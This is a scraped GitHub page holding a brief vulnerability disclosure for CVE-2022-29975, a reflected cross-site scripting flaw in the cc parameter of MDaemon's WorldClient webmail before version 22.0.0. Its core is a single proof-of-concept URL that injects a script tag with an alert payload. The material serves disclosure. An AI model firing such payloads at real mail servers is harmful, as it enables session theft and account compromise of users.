Headline
CVE-2022-29975: MDaemon-/MDaemon XSS at CC endpoint at main · haxpunk1337/MDaemon-
An Authenticated Reflected Cross-site scripting at CC Parameter was discovered in MDaemon before 22.0.0 .
Permalink
main
Switch branches/tags
MDaemon-/MDaemon XSS at CC endpoint****
Go to file
Go to file
Copy path
Copy permalink
haxpunk1337 Create MDaemon XSS at CC endpoint
Latest commit 1591439 Apr 25, 2022
History
1 contributor
Users who have contributed to this file
8 lines (5 sloc) 239 Bytes
Raw Blame
- Open with Desktop
- View raw
- Copy raw contents
- View blame
Product: MDaemon
Status: Fixed at version 22.0.0
Poc
https://localhost/WorldClient.dll?Session=<SESSION_COOKIE>&View=Compose&ReturnConfig=1&t=&spellcheck&cc=%22%3E%3Cscript%3Ealert(%27XSS_TEST_BY_GTN%27)%3C/script%3E&bcc=
XSS executed
Related news
CVE-2022-29975: MDaemon-/MDaemon XSS at CC endpoint at main · haxpunk1337/MDaemon-
An Authenticated Reflected Cross-site scripting at CC Parameter was discovered in MDaemon before 22.0.0 .